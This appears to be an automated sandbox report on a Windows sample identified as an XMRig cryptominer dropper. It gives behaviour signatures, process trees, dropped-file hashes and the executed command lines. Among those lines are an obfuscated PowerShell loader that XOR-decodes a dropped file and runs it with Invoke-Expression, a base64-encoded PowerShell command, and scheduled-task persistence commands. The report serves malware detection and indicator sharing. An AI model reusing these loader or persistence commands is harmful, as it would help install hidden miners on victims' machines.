Analysis Overview
SHA256
658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144
Threat Level: Known bad
The file 658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N was found to be: Known bad.
Malicious Activity Summary
Xmrig family
xmrig
XMRig Miner payload
Blocklisted process makes network request
Downloads MZ/PE file
Loads dropped DLL
Checks computer location settings
Deletes itself
Executes dropped EXE
Obfuscated Files or Information: Command Obfuscation
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Command and Scripting Interpreter: PowerShell
Detects Pyinstaller
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 11:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 11:45
Reported
2024-10-27 11:47
Platform
win7-20241023-en
Max time kernel
15s
Max time network
16s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe
"C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zbe20241027114540338.bat" "
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zb20241027114540338.bat" "
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /delete /tn "Maintenance" /f
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20241027114540338.xml"
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe
"C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
Network
Files
C:\Users\Admin\AppData\Local\Temp\zbe20241027114540338.bat
| MD5 | 8e1538e96332ff7b60ac15d330af55d3 |
| SHA1 | 161e7a00371107c55c4a3cb9505820d1b4c02bc6 |
| SHA256 | b73afc146054375209038ac660656a077d10e8256b1a2757126d8e5492e6117d |
| SHA512 | 9cbd7145117486ef3935a789e68622ce2942f807eb4133bba955283339af0891857c5ef98944f713c10903f25493ea41aedd1fe62aebc7bad76fe21bc85291fb |
C:\Users\Admin\AppData\Local\Temp\zb20241027114540338.bat
| MD5 | cd72d2f4156a7696edfa253a71704d7f |
| SHA1 | 5e3ecaa7c4d1319306a4781beb476cf0f951ab9d |
| SHA256 | c5d9896c1ef0beed07785be3401eb911523efce7fc569f6ba5184450dd2b4bf2 |
| SHA512 | ca409285ac8ae2047451276cbbce974d9741384afcc9abc8bdf7b5fcb8a588f60f37aac49099d895636b5fd1a7e2d5c1a11e7fbbcdaa3e570b5bf985b061f382 |
C:\Users\Admin\AppData\Local\Temp\zx20241027114540338.xml
| MD5 | e2943f1f3851cc465d729fbb717f161c |
| SHA1 | 2d9ec1338337f3c459d57edfe918c8592a7a72a3 |
| SHA256 | 285dfe3365fc4e552000a4a89c84532e46ef2e82b50336cbfd74abe9634e3eec |
| SHA512 | cba16639eec6acefe692fc845b8f6a21940459f9416f59dfafa5883cb26377ad2b86a66112f12141df318cc12419c40a87d7d6bacd83d83c89a1f16523942989 |
C:\Users\Admin\AppData\Local\Temp\ze20241027114540338.tmp
| MD5 | 21989db4b6cc664577d426658cb0855d |
| SHA1 | 01aa4808329a7f34b57dfbf345eda27f97d65369 |
| SHA256 | 870251d3d6c50b2ed787595a49e945d9ea26e0e3ff2a556c5c40a483215afae1 |
| SHA512 | e4ef93f7e5f26c347cc7fabb0c04a37f03c620f77486fe82ae17327ff035ac2dd9b80e77a156bef70de42c70c57dfd79908f2572abc487824b10eb1aa0ce71ed |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-27 11:45
Reported
2024-10-27 11:47
Platform
win10v2004-20241007-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
Loads dropped DLL
Obfuscated Files or Information: Command Obfuscation
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe
"C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe20241027114540375.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb20241027114540375.bat" "
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /delete /tn "Maintenance" /f
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
Schtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20241027114540375.xml"
C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe
"C:\Users\Admin\AppData\Local\Temp\658a6a072efe4e110cf1bcacb8361192b3d62387fab0fbc294eed6903568b144N.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe .
C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe
C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -c "if($host.version.major -lt 3){exit}$d =[IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Roaming\Maintenance\mod');$l=$d.Count;$m = New-Object Byte[] $l;[byte[]] $x=78,83,113,66,67,25,122,96;$j=0;for($i=0;$i -lt $l;$i++){$m[$i]=$d[$i] -bxor $x[$j];$j++;if($j -ge 8){$j=0}}$a = New-Object IO.MemoryStream(,$m);$b = New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($a,[IO.Compression.CompressionMode]::Decompress));$c=$b.ReadToEnd();$b.Close();$a.Close();Invoke-Expression($c)"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand ZgB1AG4AYwB0AGkAbwBuACAAYwBoAGsAcAByAGMAKAAkAHAAKQB7AA0ACgAgACgAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAC4AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAALQBjAG8AbgB0AGEAaQBuAHMAIAAiACQAcAAiACkADQAKAH0ADQAKAGkAZgAoAGMAaABrAHAAcgBjACgAJwBtAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwApACkAewANAAoAIABXAGEAaQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACcAbQBhAGkAbgB0AGUAbgBhAG4AYwBlACcADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHcAbQBuAHQAbgBuAGMAJwApACkAewANAAoAIAAgAFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcAIAAtAEYAbwByAGMAZQANAAoAIAAgAFcAYQBpAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcADQAKACAAfQAgAA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwAtACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwApACkAewBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEYAbwByAGMAZQB9AA0ACgAgAGUAeABpAHQADQAKAH0A
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
".\wmntnnc"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand 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
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand 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
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
".\wmntnnc"
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
"C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe" +
Network
Files
C:\Users\Admin\AppData\Local\Temp\zbe20241027114540375.bat
| MD5 | 906c8cf19ca118a8add05eb70ae2442b |
| SHA1 | f621f26a20f9ebfb6afe33f3aa46c207dd5a37c0 |
| SHA256 | e11936dbe5eac8ba1fe93b91ff49abf89cb4500f79225a5752865a726d840dcd |
| SHA512 | 6d4295e2c49385a888698b4626b478c7666fb4a0af2ad7123ac0dada29c88568c2aaba215a1621193d308ee26d5b2891376a8f53ec0c30d7046339f51903cda1 |
C:\Users\Admin\AppData\Local\Temp\zb20241027114540375.bat
| MD5 | 67b9b843767c9a137b65e05ee9e3d3e0 |
| SHA1 | a8fe765d374fca1ed350e611c7e6a7b1ce978e55 |
| SHA256 | 6392dd25f1a44950207073eb7b35cbe36354a2b55f4337429b61c4e63b94603a |
| SHA512 | afec8dd4d89884fd73000af46958629c33ee404ec490fc46f7ab5be419d3772c91a4cc183ce161f71b6eb9acd16173ccce7a45a30ae4a252e1035267cb40c5d2 |
C:\Users\Admin\AppData\Local\Temp\ze20241027114540375.tmp
| MD5 | 21989db4b6cc664577d426658cb0855d |
| SHA1 | 01aa4808329a7f34b57dfbf345eda27f97d65369 |
| SHA256 | 870251d3d6c50b2ed787595a49e945d9ea26e0e3ff2a556c5c40a483215afae1 |
| SHA512 | e4ef93f7e5f26c347cc7fabb0c04a37f03c620f77486fe82ae17327ff035ac2dd9b80e77a156bef70de42c70c57dfd79908f2572abc487824b10eb1aa0ce71ed |
C:\Users\Admin\AppData\Local\Temp\zx20241027114540375.xml
| MD5 | b977e8e219a6c7fe0ceb9addda88f219 |
| SHA1 | 9dbfe784af56e7d37d3dc57fc5e5ee5b6108c834 |
| SHA256 | a1712e191f87cdfded86b9ea8ef4579a2fa18e71692d250184ca30ddf1884b1c |
| SHA512 | dbe61c2a46fef68225c297b4805d4db70650c9a3fb07be3616869d5d10f5be072282f64240eb833833204afdf4c58b574f3d15d4e288e0ae68c44af00b5a3329 |
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
| MD5 | 73ad6d009f1c53c23f5d068caa805299 |
| SHA1 | f50493f49c3b2b3697b5eb571738dbc70383cac0 |
| SHA256 | a77315296dc58edac4959c9ed69ec96e9517883684edaeba3e64c48a44c186ae |
| SHA512 | 1f9c739c7b745ba57b3d7e50e00bac9d3019de25aab5bb22c0da810d963dab93d71c56686fccf737cf87a4c95fe53b8e4b3dda09ac1526fb4899aa0e1336e920 |
C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\idle_maintenance.exe
| MD5 | e2af153ed50cb5ef457972e656f1bc51 |
| SHA1 | efe31f03ec2ce99ba4ff8d573734fc4259a28edf |
| SHA256 | 043f0954abf32bf6d1669cf456a439accc7421af3ee7608e23c8e2b6e6a27c1c |
| SHA512 | 2576c511868849ab258ef0bbe2fb3cbfe72eb02dc0ab5f4d7004d7a59ff5bfba035f54a2dc7ca55d569f51d2f4de654643fafa29905b32e1b1b498ff050c699e |
C:\Users\Admin\AppData\Local\Temp\5951524c4b594f4e5192657864956548424020013\config.json
| MD5 | ac8de08dbd723ac5c24e66d8962ed5ae |
| SHA1 | 41f3b3df10b0785ee2cd65d27f5f0143b1db349b |
| SHA256 | 5822df13d5311aa5be848161f2f74ff691e64ec2251322b44a0b7e2d4c98518c |
| SHA512 | 4387d88c9804c8d7b0dc5966c3f84fe0c70aec65f88f3e592dff1c806404c9f8410b58eb2a729fc1a69657bc5f018893d6e5674863af4b7a97652d1cdbe8dc73 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbzjwkv3.biu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Maintenance\mod
| MD5 | 4a42f5e0e97e6a30d99c327546761e45 |
| SHA1 | 1f34797975932fdfde2ab5ebd53e756c071a4890 |
| SHA256 | e0ca9ddc828ccf84ee831678e37f448befde1f4af75d0460f233865ed2515954 |
| SHA512 | 07df8353ca1cc57a347b963ce5c16f0098ea9d2c7141361e847406ab2f431184ec2684552070341b2c2ae11d2a1f86f943223166a62aba999a45f03f000242b5 |
C:\Users\Admin\AppData\Roaming\Maintenance\apps\m
| MD5 | 57cb773ae7a82c8c8aae12fa8f8d7abd |
| SHA1 | 5b30e2c5ecb965cd571ebe6fa56b9b1db7e21ae4 |
| SHA256 | 8589c63b0943a62bfda9b35dccc71a30f5677386f6f7c644c3307465ce2cfa55 |
| SHA512 | 2b76813958b443598c8dbaba0d8e1048d49549862afd49828871d833ff5266cdded2625bf0147dc2be42f857196d34ec6fe4967e49a60b972c014cff51fc0ca8 |
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
| MD5 | 38b657df43b002bab8fcb08efc0adf49 |
| SHA1 | 8a4dfbe7ff29921ff9f464ba308e4e1f82698613 |
| SHA256 | e714337ac069b06aa5ba66cc37c55ebf6da0546838e96850818474544742fe58 |
| SHA512 | 79e07ec5c5daff3d6b61024e16423e6225df1f7944296fac0cd3411f2e7f731bbf1461a53602f4472c4880e6ac7837cf295510809441fc3a09625d5094bd9674 |
C:\Users\Admin\AppData\Local\Temp\_MEI43322\python27.dll
| MD5 | fc4fd09975a71eada8f10229237ba2bc |
| SHA1 | d3ffc76d46efd9d96f50c8100e88aeb97ce81691 |
| SHA256 | 9c6de49f0ba3e97fc1948fa44ca14de6a3919f0b7ee7fc5bf0b728ad5f7e330b |
| SHA512 | 1f5cad5329b27156cecba35bd35b6f36584bbbb340017ed6357f80575d3a1bb213dfe0481c62e6e51b28b1bb069be6524528f259c32008029d303e885a8772b1 |
C:\Users\Admin\AppData\Local\Temp\_MEI43~1\_ctypes.pyd
| MD5 | f1134b690b2dc0e6aa0f31be1ed9b05f |
| SHA1 | 9c27067c0070b9d9366da78c3d241b01ba1fa4ee |
| SHA256 | 030bf1aaff316dfbb1b424d91b1340b331c2e38f3e874ae532284c6170d93e7e |
| SHA512 | 7db97dd004c2d9ce28cd3856f32d96d3a2f696f922c188dbc1150ba35c9a859cdb8d5ed0264a437944ef0fb662f801e2af66f5ecce58c8ee9d2ebf852af8f170 |
C:\Users\Admin\AppData\Local\Temp\_MEI43~1\_socket.pyd
| MD5 | a9cc2ff4f9cb6f6f297c598e9f541564 |
| SHA1 | e38159f04683f0e1ed22baba0e7dcc5a9bc09172 |
| SHA256 | 36a7dd2596598916384044b680d62fc7369d246703a57178c27c74214a78585f |
| SHA512 | 9d99f546e5fa8c235fef007d8eca990350f35d11cd903c5d91611c133166845834c27b1c6a9132c71776754580d9e62fb5072ce6ada1f48feecbf408ca39026f |
C:\Users\Admin\AppData\Local\Temp\_MEI43322\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43~1\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43322\pythoncom27.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43322\pywintypes27.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43322\win32api.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43322\bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43322\Bitmessage_x86_0.6.3.2.exe.manifest
C:\Users\Admin\AppData\Local\Temp\_MEI43~1\_multiprocessing.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43322\msvcr100.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43~1\numpy.core.multiarray.pyd
C:\Users\Admin\AppData\Roaming\Maintenance\keys.dat
C:\Users\Admin\AppData\Local\Temp\_MEI43322\libopenblas.UWVN3XTD2LSS7SFIFK6TIQ5GONFDBJKU.gfortran-win32.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43322\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43322\pyexpat.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43322\msgpack._unpacker.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43322\msgpack._packer.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43322\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43322\_sqlite3.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43322\libeay32.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43322\sip.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI43322\QtCore4.dll
C:\Users\Admin\AppData\Local\Temp\_MEI43322\PyQt4.QtCore.pyd